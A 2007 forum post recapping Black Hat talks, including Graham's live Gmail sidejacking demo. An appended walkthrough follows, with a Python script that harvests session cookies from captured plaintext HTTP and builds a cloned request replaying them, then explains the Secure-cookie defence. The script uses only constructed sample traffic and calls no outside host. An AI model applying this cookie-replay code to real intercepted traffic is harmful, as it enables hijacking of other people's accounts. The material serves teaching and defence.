Black Hat was an interesting event and I enjoyed it a lot. It differs from Defcon in a number of ways, mostly in the people attending and the awesome food they made available.
As far as I could tell, most people attending seemed a little more seasoned and professional than the mix you get at Defcon. Defcon has a huge range, from teenage script kiddies to high-level hackers and everything in between. Other than that, I couldn't say that, as far as speakers go, one is tremendously better than the other, and Black Hat is the kind of convention you should attend if you have someone else paying for it. I didn't attend Defcon this time, and I am making those statements based on past experiences.
The convention began with a lecture from Richard Clarke, former advisor to the US National Security Council, and it seemed to play well to the audience. His lecture was a mix of government bashing along with hopes for great strides in technology that might take place in the future.
My first briefing was "Understanding the heap by breaking it" by Justin Ferguson. He spent a lot of time on double free() limitations and possibilities and the advantages of fast bin chunks over normal chunks. Perhaps a bit too much time, and it was unfortunate he was unable to show any code, which he did apologize for.
The next briefing was "Database Forensics" by David Litchfield. His lecture was centered on Oracle, and he did a good job showing the difficulty of analyzing that database when it has been breached. He mentioned that there are no database-specific forensic tools available on the market. Most everything he displayed was in hex, and he said he hoped to soon have a tool written to help eliminate so much manual forensic inspection, which can be very tedious. He performed a SQL injection attack and then did forensics on the database.
Certainly one of the most popular briefings was "Tactical Exploitation" by H.D. Moore of Metasploit fame. He did a nice walk-through of compromising an organization without the use of normal exploit code. A number of the tools are not available yet but should be soon, as new modules for Metasploit.
For me the most interesting lecture was "Simple solutions to complex problems from the lazy hacker's handbook" by David Maynor and Robert Graham. Robert Graham gave his Web 2.0 hijacking presentation to a packed audience. The audience erupted with applause and laughter when Graham used his tools to hijack someone's Gmail account during an unscripted demo. The victim in this case was using a typical unprotected Wi-Fi hotspot, and his Gmail account just popped up on the large projection screen for the audience to see. I was wondering if he had just committed a felony by opening up the unsuspecting victim's email account, lol? First he captures the Wi-Fi signals using his laptop and a tool called Ferret, which he wrote earlier this year. The tool grabs cookies and session IDs from your web browser session sent over the air and stores them. Then Graham fires up his new tool called Hamster, which processes those session IDs and cookies so that they're ready to clone. Once the identity is cloned, the attacker is able to jump onto online services like Gmail masquerading as the victim, with full access to read and send email on behalf of the victim. Also, the attacker can go to maps.google.com and find the victim's personal information, like home address, if it's saved into Google Maps. Since the session key doesn't expire in email accounts like Yahoo or Hotmail, it doesn't matter if the victim changes his password. Graham claims he can still log in, even years later.
In reality the highlight was meeting up with EH-net members Don, Brian and Chris. Also, Don and I had a great lunch with the people from Backtrack/Offensive Security, Muts and Ziplock. Two great guys, and they are working on getting Backtrack 3 out as soon as they can.
Last edited by Kev on Mon Aug 06, 2007 1:50 pm, edited 1 time in total.
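The sidejacking attack Kev describes above (sniff plaintext HTTP on an open hotspot, harvest the Cookie header, replay it from the attacker's box) boils down to a few lines once you have the packets. The following is an added example, not code from Kev's post and not Graham's Ferret or Hamster; the captured HTTP request and response are constructed by hand, and the host, path, cookie names and values are made up. It also shows the check a practitioner wants: which cookies the server set without the Secure attribute, since those are the ones a browser will send over plain HTTP and therefore the ones that can be sniffed. HttpOnly does nothing here; it only blocks script access, not the wire.

```python
"""Sidejacking walkthrough: harvest session cookies from sniffed plaintext HTTP
and build a cloned request that reuses them. Added example with constructed
traffic; it is not Ferret/Hamster and does not touch the network."""
from typing import Dict, List, Tuple

# Constructed sample of what sits in the air on an open Wi-Fi hotspot: one
# plaintext response setting cookies, and one later plaintext request from the
# same browser. Hostname, paths, cookie names and values are all made up.
CAPTURED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: SID=abc123; Path=/; HttpOnly\r\n"          # sniffable
    b"Set-Cookie: PREF=lang=en; Path=/\r\n"                   # sniffable
    b"Set-Cookie: SSID=s3cret; Path=/; Secure; HttpOnly\r\n"  # HTTPS only
    b"Content-Length: 0\r\n\r\n"
)
CAPTURED_REQUEST = (
    b"GET /mail/ HTTP/1.1\r\n"
    b"Host: mail.example.com\r\n"
    b"Cookie: SID=abc123; PREF=lang=en\r\n"   # note: no SSID, it was Secure
    b"User-Agent: VictimBrowser/1.0\r\n\r\n"
)


def parse_headers(msg: bytes) -> Tuple[str, List[Tuple[str, str]]]:
    """Split an HTTP message into its start line and (lowercased name, value) headers."""
    head, _, _ = msg.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def harvest_cookies(request: bytes) -> Dict[str, str]:
    """Ferret-style step: pull every name=value out of the Cookie header(s)
    of a sniffed request. partition() keeps '=' inside values (PREF=lang=en)."""
    _, headers = parse_headers(request)
    jar: Dict[str, str] = {}
    for name, value in headers:
        if name != "cookie":
            continue
        for pair in value.split(";"):
            key, _, val = pair.strip().partition("=")
            if key:
                jar[key] = val
    return jar


def insecure_cookies(response: bytes) -> List[str]:
    """Names of cookies the server set WITHOUT the Secure attribute. Browsers
    send these over plain HTTP too, so they are the sidejackable ones."""
    _, headers = parse_headers(response)
    exposed = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].partition("=")[0]
        attrs = {p.lower() for p in parts[1:]}
        if "secure" not in attrs:
            exposed.append(cookie_name)
    return exposed


def clone_request(host: str, path: str, jar: Dict[str, str]) -> bytes:
    """Hamster-style step: a fresh request from the attacker's machine that
    carries the victim's cookies. The server cannot tell it from the victim."""
    cookie_hdr = "; ".join(f"{k}={v}" for k, v in jar.items())
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {cookie_hdr}\r\n"
        f"User-Agent: AttackerBrowser/1.0\r\n\r\n"
    ).encode()


if __name__ == "__main__":
    print("sidejackable cookies:", insecure_cookies(CAPTURED_RESPONSE))
    jar = harvest_cookies(CAPTURED_REQUEST)
    print("harvested:", jar)
    print(clone_request("mail.example.com", "/mail/", jar).decode())
```

The point of the constructed capture is the third cookie: SSID was set with Secure, so the victim's browser never put it on the plaintext request and the attacker never gets it. That is the whole defense against this attack: serve the site over HTTPS and mark the session cookie Secure, so that nothing worth cloning ever crosses the hotspot in the clear.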